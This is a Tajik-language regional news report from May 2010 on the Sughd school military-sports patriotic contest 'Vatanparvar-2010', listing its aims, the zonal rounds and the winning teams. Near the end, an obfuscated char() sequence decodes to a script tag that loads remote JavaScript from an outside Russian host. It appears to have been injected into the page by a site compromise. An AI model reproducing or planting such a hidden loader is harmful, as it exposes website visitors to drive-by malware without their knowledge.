7.05.2010
Озмуни вилоятии ватанпарастонаи ҳарбӣ–варзишии «Ватанпарвар-2010»
Суғд. Санаи 6 май бахшида ба 65 солагии Иди Ғалаба дар Ҷанги Бузурги Ватанӣ ва таҷлили Рӯзи ҷавонони Тоҷикистон дар вилояти Суғд дар қисми низомии 3501-и шаҳри Хуҷанд давраи ниҳонии озмуни вилоятии ватанпарастонаи ҳарбӣ–варзишии «Ватанпарвар-2010» байни хонандагони синфҳои 9-11 мактабҳои таҳсилоти умумӣ гузаронида шуд.
Раёсати ҷавонон, варзиш ва сайёҳии вилояти Суғд дар ҳамҷоягӣ бо Маркази таҳсилоти иловагии вилоят бо мақсади таблиғи ғояҳои ифтихори миллӣ ва ватанпарастии ҷавонон, зиёд намудани сафи ҷавонони ихтиёрӣ ба хизмати ҳарбӣ, дастгириву ҳавасмандгардонии ҷавонон ба хизмати Ватан, баланд бардоштани ҳисси ватанпарастии ҷавонони то синни даъватӣ, тарбияи масъулият нисбат ба хониш, сифати олии маънавӣ, ташаббускорӣ, худфаъолиятӣ, шуурнокӣ, бародарӣ байни ҳамдигар, ҷасорат, зиракӣ, тобовар будан дар ҳамаи ҳолатҳо ва ҷалби онҳо ба чорабиниҳои ҳарбӣ – варзишии ҷавонон озмуни вилоятии ватанпарастонаи ҳарбӣ–варзишии «Ватанпарвар-2010»-ро байни хонандагони синфҳои 9-11 мактабҳои таҳсилоти умумӣ гузаронида истодааст.
Муқофиқи низомномаи озмуни вилоятӣ аз рӯи нишондодҳо аз қисматҳои дохилимактабӣ, ноҳиявӣ, минтақавӣ ва вилоятӣ иборат буда, теъдоди иштирокчиён аз ҳамаи мактабҳои таҳсилоти умумии вилоят 19 нафарӣ мебошад. Озмун ҳарбӣ–варзишии «Ватанпарвар-2010» аз рӯи намуди варзиши сабук давидан ба масофаи 100м, пойга ба масофаи 500м, ҷаҳидан ба дарозӣ, ҳаво додани гулӯлаҳо, мудофиаи шаҳрвандӣ, нозири ҳаракат, сӯхторнишонӣ ва тайёрии тиббию санитарӣ иштирок карда истодаанд.
То санаи 16 апрели соли равон озмуни вилоятӣ дар мактабҳои таҳсилоти умумӣ гузаронида шуда, ғолибони дохилимактабӣ дар давраи минтақавӣ иштирок намуднд.
Санаи 16 апрел озмуни минтқавӣ дар н. Б.Ғафуров байни ғолибони мактабҳои таҳсилоти умумии шаҳру ноҳияҳои Қайроққум, Табошар, Чкалов, Спитамен, Б.Ғафуров, Ҷ.Расулов баргузор гардида ҷои аввал насиби дастаи н. Б. Ғафуров, ҷои дуюм ба дастам ш. Чкалов ва ҷои сеюм насиби дастаи н. Ҷ. Расулов гардид.
Санаи 19 апрел озмуни минтқавӣ дар ш. Конибодом байни ғолибони мактабҳои таҳсилоти умумии шаҳру ноҳияҳои Хуҷанд, Конибодом, Исфара, Мастчоҳ, Ашт баргузор гардида ҷои аввал насиби ш. Конибодом, ҷои дуюм ш. Хуҷанд ва ҷои сеюм нисиби ш. Исфара гардид.
Санаи 21 апрел озмуни минтқавӣ дар ш. Истаравшан байни ғолибони мактабҳои таҳсилоти умумии шаҳру ноҳияҳои Шаҳристон, Ғончӣ, Зафаробод, Истаравшан баргузор гардида ҷои аввал насиби ш. Истаравшан, ҷои дуюм ноҳияҳои Ғончӣ ва Шаҳристон ва ҷои сеюм насиби н. Зафаробод гардид.
Дар давраи ҷамъбастии мусобиқаи ҳарбӣ-варзишии «Втанпарвар-2010» дастаҳои ғолиби давраи минтақавӣ – дастаи н. Б. Ғафуров, дастаи ш. Истаравшан ва дастаи ш. Конибодом иштирок намуданд.
Иштирокчиёни мусобиқа дар давраи вилотяӣ аз рӯи намудҳои варзиши сабук, давидан ба масофаи 100м, пойга ба масофаи 500м, ҷаҳидан ба дарозӣ, ҳаво додани гулӯлаҳо, ҳаво додани граната мудофиаи шаҳрвандӣ, нозири ҳаракат, сӯхторнишонӣ, турниккашӣ ва тайёрии тиббию санитарӣ чунин ҷойҳоро ишғол намуданд:
Ҷои аввал: дастаи мактаби таҳсилоти умумии шаҳри Истаравшан.
Ҷои дуюм: дастаи мактаби таҳсилоти умумии шаҳри Конибодом
Ҷои сеюм: мактаби таҳсилоти умумии ноҳияи Б. Ғафуров.
Ғолибон ва иштирокчиёни фаъоли мусобиқа бо тӯҳфаю ифтихорномаҳои Раёсати ҷавонон, варзиш ва сайёҳии вилоят ва Раёсати маорифи вилояти Суғд қадрдонӣ карда шуданд.
char(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,112,105,107,115,117,115,46,109,115,107,46,114,117,47)ed68d8d059247ba72a74deba872608e2.js" type="text/javascript">

Суғд